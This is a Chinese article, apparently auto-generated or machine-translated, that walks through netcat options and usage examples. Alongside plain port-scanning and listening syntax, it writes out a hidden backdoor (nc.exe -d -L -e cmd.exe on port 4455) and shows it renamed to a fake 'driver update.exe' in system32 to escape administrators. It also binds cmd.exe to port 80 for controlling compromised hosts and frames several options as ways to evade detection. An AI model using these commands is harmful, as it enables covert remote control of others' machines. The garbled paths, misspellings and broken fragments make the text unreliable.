大家好，小小來(lái)為大家解答以下問題，netcat windows，netcat很多朋友還不知道，現(xiàn)在讓我們一起來(lái)看看吧！

1、 nc的全稱是NetCat，它可以建立和接受傳輸控制協(xié)議(TCP)和用戶數(shù)據(jù)報(bào)協(xié)議(UDP)之間的連接，Netcat可以在這些連接上讀寫數(shù)據(jù)，直到連接關(guān)閉。它可以手動(dòng)或通過(guò)腳本與網(wǎng)絡(luò)應(yīng)用程序或應(yīng)用層的服務(wù)進(jìn)行交互。從技術(shù)上講，NetCat不能生成UDP連接，因?yàn)閁DP是無(wú)連接協(xié)議。NetCat沒有圖形界面，比較粗糙原始。

2、 nc的命令行

3、 nc的基本命令行形式是nc [options] host ports，其中host是要掃描的主機(jī)名或IP地址，ports可以是單個(gè)端口、端口范圍(以m-n的形式指定)或一系列由空格分隔的單個(gè)端口。

4、 -d只對(duì)Windows操作系統(tǒng)有用。該選項(xiàng)使NetCat工作在stealth模式，從而在MS-DOS命令提示符下運(yùn)行出環(huán)境，這樣nc就可以在不保持命令窗口打開的情況下運(yùn)行在監(jiān)控模式下，還可以幫助黑客隱藏和監(jiān)控NetCat實(shí)例而不被系統(tǒng)管理員發(fā)現(xiàn)。

5、 -e如果NetCat使用gaping _ security _ hole選項(xiàng)進(jìn)行編譯，只要有人在網(wǎng)絡(luò)后臺(tái)監(jiān)聽的任何端口上建立連接，NetCat就會(huì)執(zhí)行，并且客戶端的NetCat會(huì)將I/O通過(guò)管道傳輸?shù)秸趧e處監(jiān)聽的另一個(gè)NetCat實(shí)例。使用這個(gè)選項(xiàng)是非常危險(xiǎn)的，除非你很了解nc，至少你知道自己在做什么。這是在系統(tǒng)中構(gòu)建后門外殼的一種非常快速簡(jiǎn)單的方法。

6、 -i延遲間隔，表示nc在兩次數(shù)據(jù)傳輸之間等待的時(shí)間。例如，當(dāng)通過(guò)管道向nc傳輸文件時(shí)，nc在傳輸下一個(gè)輸入行之前等待的秒數(shù)。當(dāng)使用nc在主機(jī)的多個(gè)端口之間操作時(shí)，nc在切換到下一個(gè)端口之前等待的秒數(shù)。這可以使黑客在傳輸數(shù)據(jù)或攻擊服務(wù)時(shí)更加隱蔽，也有助于您的端口掃描不被入侵檢測(cè)系統(tǒng)和系統(tǒng)管理員發(fā)現(xiàn)。

7、 -g選項(xiàng)具有欺騙性。Nc支持松散的源路由。您可以在命令行上指定最多8 -g選項(xiàng)，以強(qiáng)制nc流量通過(guò)特定的IP地址。當(dāng)您為流量設(shè)置偽造的源IP地址時(shí)，您可以使用此方法通過(guò)防火墻過(guò)濾或允許訪問主機(jī)列表，希望收到主機(jī)的響應(yīng)。

8、 -g該選項(xiàng)允許用戶使用由-G選項(xiàng)指定的路由列表中指定的地址作為當(dāng)前的下一條路由。由于IP地址的大小為4字節(jié)(IPV4)，因此該參數(shù)始終是4字節(jié)的倍數(shù)；例如，4代表路由表中的第一個(gè)IP地址，8代表第二個(gè)IP地址，依此類推。通過(guò)偽造源路由表的一部分，這使得消息看起來(lái)非常有用。作弊路由的時(shí)候，這個(gè)功能有助于屏蔽你的位置，但是你可能收不到響應(yīng)消息，因?yàn)轫憫?yīng)消息會(huì)通過(guò)偽造的IP地址路由回來(lái)。

9、 -l該選項(xiàng)切換nc的監(jiān)控模式。該選項(xiàng)必須與-p選項(xiàng)一起使用，以告訴nc綁定到指定的TCP端口并等待傳入的連接。如果切換到-u選項(xiàng)，應(yīng)該使用UDP端口而不是TCP端口。

10、 -L此選項(xiàng)在Windows版本中很有用。當(dāng)連接關(guān)閉時(shí)，使用相同的命令行選項(xiàng)重新啟動(dòng)監(jiān)聽模式。即使初始連接已經(jīng)結(jié)束，nc也可以在沒有用戶干預(yù)的情況下接收新連接。和-l一樣，必須和-p一起使用。

11、 -n這個(gè)選項(xiàng)告訴我們nc不做任何主機(jī)名查找。

12、 -0對(duì)數(shù)據(jù)執(zhí)行十六進(jìn)制轉(zhuǎn)儲(chǔ)，并將其存儲(chǔ)在hexfile中。命令nc-o hexfile會(huì)記錄雙向通信的數(shù)據(jù)，每行開頭會(huì)有一個(gè)'或'分別表示是傳入數(shù)據(jù)還是傳出數(shù)據(jù)。如果只想獲得傳入數(shù)據(jù)的十六進(jìn)制轉(zhuǎn)儲(chǔ)，可以使用nc -ohexfile命令。

13、 -p讓用戶指定nc應(yīng)該使用的本地端口號(hào)。當(dāng)使用帶有-l或-L選項(xiàng)的監(jiān)聽模式時(shí)，此參數(shù)是必需的。如果沒有為傳出連接指定該參數(shù)，nc將使用系統(tǒng)分配給它的任何端口，就像大多數(shù)其他TCP或UDP客戶端一樣。

14、 -r該參數(shù)使nc能夠隨機(jī)選擇本地和遠(yuǎn)程端口。當(dāng)使用nc獲取系統(tǒng)中大量端口的信息時(shí)，如果混合源端口和目的端口的順序看起來(lái)不像端口掃描，則此選項(xiàng)非常有用。當(dāng)此選項(xiàng)與-i選項(xiàng)和足夠大的時(shí)間間隔結(jié)合使用時(shí)，成功掃描未被注意的端口的機(jī)會(huì)可以大大提高。

15、 -s指定nc在建立連接時(shí)使用的IP地址。這個(gè)選項(xiàng)允許黑客做一些工作。它允許黑客隱藏他們的IP地址或假冒他人的IP地址，但要獲得任何有關(guān)路由到他們欺騙的地址的信息，他們需要使用-g source路由選項(xiàng)。其次，在監(jiān)聽模式下，大多數(shù)情況下可以和一個(gè)已經(jīng)監(jiān)聽的服務(wù)“預(yù)綁定”，所有的TCP和UDP服務(wù)都綁定到某個(gè)端口。

16、 -t如果使用telnet選項(xiàng)進(jìn)行編譯，nc可以與telnet服務(wù)器協(xié)商telnet選項(xiàng)。雖然它的響應(yīng)是無(wú)意義的信息，但是你可以通過(guò)這個(gè)狀態(tài)看到連接端口23的信息。

17、 -u nc使用UDP而不是TCP，它在客戶端模式和監(jiān)聽模式下都有效。

18、 -v控制nc將做什么的程度。比如用nc -v，nc只會(huì)把收到的數(shù)據(jù)吐出來(lái)。單個(gè)v可以知道它所連接或綁定的地址是否有問題，第二個(gè)v可以讓nc知道它在連接結(jié)束時(shí)發(fā)送和接收了多少數(shù)據(jù)。

19、 -w控制nc放棄連接之前等待的時(shí)間。同時(shí)，它還告訴nc在接收到標(biāo)準(zhǔn)輸入上的eof(文件結(jié)束)后，應(yīng)該等待多長(zhǎng)時(shí)間來(lái)關(guān)閉連接并退出。如果您通過(guò)nc向遠(yuǎn)程服務(wù)器發(fā)送命令，并希望返回大量數(shù)據(jù)(例如，向web服務(wù)器發(fā)送http命令以下載一個(gè)大文件)，則此選項(xiàng)非常有用。

20、 數(shù)控的具體使用

21、 C: NC。cmd.exe可以很好地隱藏一個(gè)NetCat后門。

22、 C: NC。exe-p 4455-D-L-E cmd.exe這個(gè)命令允許黑客使用NetCat返回系統(tǒng)，直到系統(tǒng)管理員看到nc.exe在任務(wù)管理器中運(yùn)行，從而找到這個(gè)后門。我們也可以讓它更隱蔽。

23、 c:移動(dòng)nc.exe c:windows system 32 driver update . exe

24、 c:windows系統(tǒng)32 driver update . exe-p 4455-d-L-e cmd.exe

25、 系統(tǒng)管理員可能會(huì)給一些無(wú)害的程序附加特權(quán)，如update.exe，黑客也可以隱藏命令行。

26、 c:windowssystme 32 driver update . exe

27、 cmd線：-L-p 4455-d-L-e cmd.exe

28、 丙：

29、 Nc -l-p 80監(jiān)聽端口80

30、 Nc -l -p 80 c:log.dat監(jiān)聽端口80，并將信息記錄在log.dat中。

31、 Nc -v -l -p 80監(jiān)聽端口80并顯示端口信息。

32、 Nc -vv -l -p 80監(jiān)聽端口80，并顯示更詳細(xì)的端口信息。

33、 NC-L-P 80-T-E cmd.exe監(jiān)控本地端口80的入站信息，同時(shí)將cmd.exe重定向到端口80。當(dāng)有人連接時(shí)，讓cmd.exe以telnet的形式回復(fù)。當(dāng)然，這個(gè)最好用在控制肉雞上。

34、 Nc -v ip端口掃描ip的一個(gè)端口。

35、 Nc -v -z ip port-port掃描ip端口到端口。

36、 Nc -v -z -u ip port-port將ip的UDP端口掃描到UDP端口。

今天本文講解到此結(jié)束，希望對(duì)你有所幫助。

　　免責(zé)聲明：本文由用戶上傳，與本網(wǎng)站立場(chǎng)無(wú)關(guān)。財(cái)經(jīng)信息僅供讀者參考，并不構(gòu)成投資建議。投資者據(jù)此操作，風(fēng)險(xiǎn)自擔(dān)。 如有侵權(quán)請(qǐng)聯(lián)系刪除！